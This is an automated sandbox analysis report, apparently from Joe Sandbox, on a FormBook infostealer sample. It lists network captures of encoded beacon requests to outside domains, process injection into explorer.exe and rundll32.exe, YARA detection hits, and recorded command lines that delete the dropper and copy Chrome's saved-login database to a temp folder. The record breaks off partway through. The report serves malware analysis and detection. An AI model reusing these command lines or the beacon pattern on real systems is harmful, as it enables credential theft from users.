                                                                                          Data Ascii: ;-ms-flex:0 1 474px;flex:0 1 474px;background:#38444f 50% 6em no-repeat;background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMjgiIGhlaWdodD0iNjkyIiB2aWV3Qm94PSIwIDAgMjI3LjYgNjkxLjgiPjxw
                                                                                          Oct 8, 2021 10:01:38.183763981 CEST5822INData Raw: 7a 4c 6a 6c 49 4d 54 45 30 4c 6a 64 32 4d 54 4d 75 4f 55 67 79 4d 54 67 75 4f 47 4d 7a 4c 6a 6b 67 4d 43 41 33 4c 54 4d 75 4d 53 41 33 4c 54 59 75 4f 55 4d 79 4d 6a 55 75 4f 43 41 32 4e 7a 63 67 4d 6a 49 79 4c 6a 63 67 4e 6a 63 7a 4c 6a 6b 67 4d
                                                                                          Data Ascii: zLjlIMTE0Ljd2MTMuOUgyMTguOGMzLjkgMCA3LTMuMSA3LTYuOUMyMjUuOCA2NzcgMjIyLjcgNjczLjkgMjE4LjggNjczLjl6IiBmaWxsPSIjQTJBN0FDIi8+PHBhdGggZD0iTTIyMi43IDI4OC45SDYuMWMtMS43IDAtMyAxLjMtMyAzdjRjMC0xLjcgMS4zLTMgMy0zaDIxNi42YzEuNyAwIDMgMS4zIDMgM3YtNEMyMjUuNy
                                                                                          Oct 8, 2021 10:01:38.183801889 CEST5823INData Raw: 6b 30 78 4d 54 51 75 4e 79 41 7a 4f 54 49 75 4d 57 67 78 4d 54 46 32 4e 79 34 30 53 44 45 78 4e 43 34 33 56 6a 4d 35 4d 69 34 78 65 69 49 67 5a 6d 6c 73 62 44 30 69 49 7a 45 30 51 6a 64 46 51 53 49 76 50 6a 78 77 59 58 52 6f 49 47 51 39 49 6b 30
                                                                                          Data Ascii: k0xMTQuNyAzOTIuMWgxMTF2Ny40SDExNC43VjM5Mi4xeiIgZmlsbD0iIzE0QjdFQSIvPjxwYXRoIGQ9Ik0zLjEgMzg0LjdoNzYuMXYxNC44SDMuMVYzODQuN3oiIGZpbGw9IiM3MUU5RkYiLz48cGF0aCBkPSJNMy4xIDM2NC4xaDIyMi42djcuNEgzLjFWMzY0LjF6IiBmaWxsPSIjMjA5OUQwIi8+PHBhdGggZD0iTTMuMSAz
                                                                                          Oct 8, 2021 10:01:38.183840990 CEST5824INData Raw: 46 4d 30 59 30 52 6b 59 69 4c 7a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4e 54 67 75 4e 53 41 78 4e 43 34 32 51 7a 63 7a 4c 6a 55 67 4e 43 34 33 49 44 45 78 4e 53 34 32 4c 54 49 75 4e 43 41 78 4d 7a 59 75 4e 43 41 7a 4f 57 4d 78 4e 79 34 30 4c
                                                                                          Data Ascii: FM0Y0RkYiLz48cGF0aCBkPSJNNTguNSAxNC42QzczLjUgNC43IDExNS42LTIuNCAxMzYuNCAzOWMxNy40LTEzLjYgMzUuNC03LjcgNDQtMS4zIDExLjMgOC4zIDE0LjggMTkuMyAxNS4xIDI4LjMgMC40LTkuNC0yLjUtMjItMTUuMS0zMS4zIC04LjYtNi4zLTI2LjYtMTIuMi00NCAxLjRDMTE1LjYtNS40IDczLjUgMS43ID
                                                                                          Oct 8, 2021 10:01:38.183881044 CEST5826INData Raw: 69 34 79 49 44 55 75 4d 79 30 32 4c 6a 45 67 4c 54 41 75 4d 53 30 7a 4c 6a 6b 74 4e 43 30 34 4c 6a 6b 74 4e 53 34 7a 4c 54 45 77 4c 6a 56 32 4c 54 41 75 4d 6d 4d 77 49 44 41 67 4d 43 41 77 4c 6a 45 74 4d 43 34 78 49 44 41 75 4d 53 41 77 49 44 41
                                                                                          Data Ascii: i4yIDUuMy02LjEgLTAuMS0zLjktNC04LjktNS4zLTEwLjV2LTAuMmMwIDAgMCAwLjEtMC4xIDAuMSAwIDAgMC0wLjEtMC4xLTAuMXYwLjJjLTEuMyAxLjYtNS4zIDYuNi01LjMgMTAuNSAtMC4xIDQgMyA2LjEgNS4zIDYuMVYyNDguM3pNMTY5LjggMjEzLjhjMCAwIDAgMC4xLTAuMSAwLjEgMCAwIDAtMC4xLTAuMS0wLjF2
                                                                                          Oct 8, 2021 10:01:38.183917999 CEST5827INData Raw: 77 64 6a 42 6a 4d 69 34 7a 4c 54 41 75 4d 53 41 31 4c 6a 51 74 4d 69 34 79 49 44 55 75 4d 79 30 32 4c 6a 45 67 4c 54 41 75 4d 53 30 7a 4c 6a 6b 74 4e 43 30 34 4c 6a 6b 74 4e 53 34 7a 4c 54 45 77 4c 6a 56 57 4d 6a 55 35 4c 6a 68 36 54 54 45 31 4e
                                                                                          Data Ascii: wdjBjMi4zLTAuMSA1LjQtMi4yIDUuMy02LjEgLTAuMS0zLjktNC04LjktNS4zLTEwLjVWMjU5Ljh6TTE1NC4zIDIwMC43di0wLjFjMCAwIDAgMCAwIDAuMSAwIDAgMCAwIDAtMC4xdjAuMWMtMC45IDEuMi0zLjggNC45LTMuOSA3LjcgLTAuMSAyLjkgMi4yIDQuNSAzLjkgNC41djBjMCAwIDAgMCAwIDBzMCAwIDAgMHYwYz
                                                                                          Oct 8, 2021 10:01:38.183957100 CEST5828INData Raw: 6a 49 74 4d 79 34 34 49 44 51 75 4f 53 30 7a 4c 6a 6b 67 4e 79 34 33 49 43 30 77 4c 6a 45 67 4d 69 34 35 49 44 49 75 4d 69 41 30 4c 6a 55 67 4d 79 34 35 49 44 51 75 4e 58 59 77 59 7a 41 67 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 41
                                                                                          Data Ascii: jItMy44IDQuOS0zLjkgNy43IC0wLjEgMi45IDIuMiA0LjUgMy45IDQuNXYwYzAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwdjBjMS43LTAuMSAzLjktMS42IDMuOC00LjUgLTAuMS0yLjktMi45LTYuNS0zLjgtNy43VjIxNC43ek0xNzQuNSAxODguMmMwIDAgMCAwIDAgMC4xIDAgMCAwIDAgMC0wLjF2MC4xYy0wLjkgMS4yLTMu
                                                                                          Oct 8, 2021 10:01:38.183995008 CEST5830INData Raw: 74 4d 79 34 34 4c 54 63 75 4e 31 59 79 4e 6a 49 75 4e 33 70 4e 4d 54 51 79 4c 6a 4d 67 4d 6a 63 78 4c 6a 56 6a 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 41 75 4d 53 41 77 49 44 41 67 4d 43 41 77 49 44 41 74 4d 43 34 78 64 6a 41 75 4d 57 4d 74 4d
                                                                                          Data Ascii: tMy44LTcuN1YyNjIuN3pNMTQyLjMgMjcxLjVjMCAwIDAgMCAwIDAuMSAwIDAgMCAwIDAtMC4xdjAuMWMtMC45IDEuMi0zLjggNC45LTMuOSA3LjcgLTAuMSAyLjkgMi4yIDQuNSAzLjkgNC41djBjMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDB2MGMxLjctMC4xIDMuOS0xLjYgMy44LTQuNSAtMC4xLTIuOS0yLjktNi41LTMuOC
                                                                                          Oct 8, 2021 10:01:38.184041023 CEST5831INData Raw: 3a 32 35 30 70 78 3b 66 6c 65 78 2d 62 61 73 69 73 3a 32 35 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 72 65 6d 20 2d 34 2e 38 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 36 36 70 78 20 61 75 74
                                                                                          Data Ascii: :250px;flex-basis:250px;background-position:5rem -4.8rem;background-size:166px auto}.main{min-height:0;-webkit-box-flex:0;-ms-flex:none;flex:none}}@media(max-width:479px){h2{font-size:3rem}.main{padding:3rem}}</style></head><body><div cl


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          8192.168.2.3498693.223.115.18580C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:01:43.359124899 CEST5838OUTGET /nqn4/?T2MpwT=1VzaRmvUXe4pCORdptTlduQET280TPZEdmjA3nEATW/6bXP3pygViu3GMM/9v+eynZ6+&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.cosmetictreat.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:01:43.497049093 CEST5839INHTTP/1.1 302 Found
                                                                                          Cache-Control: private
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Location: https://www.hugedomains.com/domain_profile.cfm?d=cosmetictreat&e=com
                                                                                          Server: Microsoft-IIS/8.5
                                                                                          X-Powered-By: ASP.NET
                                                                                          Date: Fri, 08 Oct 2021 08:00:53 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 189
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 63 6f 73 6d 65 74 69 63 74 72 65 61 74 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=cosmetictreat&amp;e=com">here</a>.</h2></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          9192.168.2.349870145.131.10.22680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:01:58.659625053 CEST5841OUTGET /nqn4/?T2MpwT=3boPinz1+GTktZtFPn4Wh9WVNEiaR4p62fPMr1up18b62Q31EEwhNzwdf2qpwnv2m2XV&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.geefmijcorona.online
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:01:58.717370033 CEST5841INHTTP/1.1 302 Found
                                                                                          Date: Fri, 08 Oct 2021 08:01:58 GMT
                                                                                          Server: Apache
                                                                                          X-Powered-By: PHP/7.4.22
                                                                                          Cache-Control: max-age=86400, public, s-maxage=86400
                                                                                          Location: /
                                                                                          Vary: Origin
                                                                                          Content-Length: 250
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          X-Varnish: 110985242
                                                                                          Age: 0
                                                                                          Via: 1.1 varnish-v4
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='/'" /> <title>Redirecting to /</title> </head> <body> Redirecting to <a href="/">/</a>. </body></html>


                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          Analysis Process: MV ROCKET_PDA.exe PID: 7032 Parent PID: 4456

                                                                                          General

                                                                                          Start time:09:59:57
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Users\user\Desktop\MV ROCKET_PDA.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\Desktop\MV ROCKET_PDA.exe'
                                                                                          Imagebase:0x400000
                                                                                          File size:257790 bytes
                                                                                          MD5 hash:754D58F597C5947D64269AD73F3E38FE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: MV ROCKET_PDA.exe PID: 7068 Parent PID: 7032

                                                                                          General

                                                                                          Start time:09:59:58
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Users\user\Desktop\MV ROCKET_PDA.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\Desktop\MV ROCKET_PDA.exe'
                                                                                          Imagebase:0x400000
                                                                                          File size:257790 bytes
                                                                                          MD5 hash:754D58F597C5947D64269AD73F3E38FE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: explorer.exe PID: 3352 Parent PID: 7068

                                                                                          General

                                                                                          Start time:10:00:01
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                          Imagebase:0x7ff720ea0000
                                                                                          File size:3933184 bytes
                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: rundll32.exe PID: 1744 Parent PID: 3352

                                                                                          General

                                                                                          Start time:10:00:19
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Imagebase:0x11f0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: cmd.exe PID: 5368 Parent PID: 1744

                                                                                          General

                                                                                          Start time:10:00:24
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:/c del 'C:\Users\user\Desktop\MV ROCKET_PDA.exe'
                                                                                          Imagebase:0xd80000
                                                                                          File size:232960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: conhost.exe PID: 4648 Parent PID: 5368

                                                                                          General

                                                                                          Start time:10:00:24
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7f20f0000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: cmd.exe PID: 6464 Parent PID: 1744

                                                                                          General

                                                                                          Start time:10:03:37
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                                                                                          Imagebase:0x7ff62a980000
                                                                                          File size:232960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: conhost.exe PID: 5456 Parent PID: 6464

                                                                                          General

                                                                                          Start time:10:03:37
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7f20f0000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: 5jsdph8p9l_r.exe PID: 7056 Parent PID: 3352

                                                                                          General

                                                                                          Start time:10:03:38
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          Imagebase:0x400000
                                                                                          File size:257790 bytes
                                                                                          MD5 hash:754D58F597C5947D64269AD73F3E38FE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: 5jsdph8p9l_r.exe PID: 1280 Parent PID: 7056

                                                                                          General

                                                                                          Start time:10:03:39
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          Imagebase:0x400000
                                                                                          File size:257790 bytes
                                                                                          MD5 hash:754D58F597C5947D64269AD73F3E38FE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: 5jsdph8p9l_r.exe PID: 4024 Parent PID: 3352

                                                                                          General

                                                                                          Start time:10:03:48
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe'
                                                                                          Imagebase:0x400000
                                                                                          File size:257790 bytes
                                                                                          MD5 hash:754D58F597C5947D64269AD73F3E38FE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: 5jsdph8p9l_r.exe PID: 2064 Parent PID: 4024

                                                                                          General

                                                                                          Start time:10:03:50
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe'
                                                                                          Imagebase:0x400000
                                                                                          File size:257790 bytes
                                                                                          MD5 hash:754D58F597C5947D64269AD73F3E38FE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: 5jsdph8p9l_r.exe PID: 4748 Parent PID: 3352

                                                                                          General

                                                                                          Start time:10:03:57
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe'
                                                                                          Imagebase:0x400000
                                                                                          File size:257790 bytes
                                                                                          MD5 hash:754D58F597C5947D64269AD73F3E38FE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, Author: Joe Security
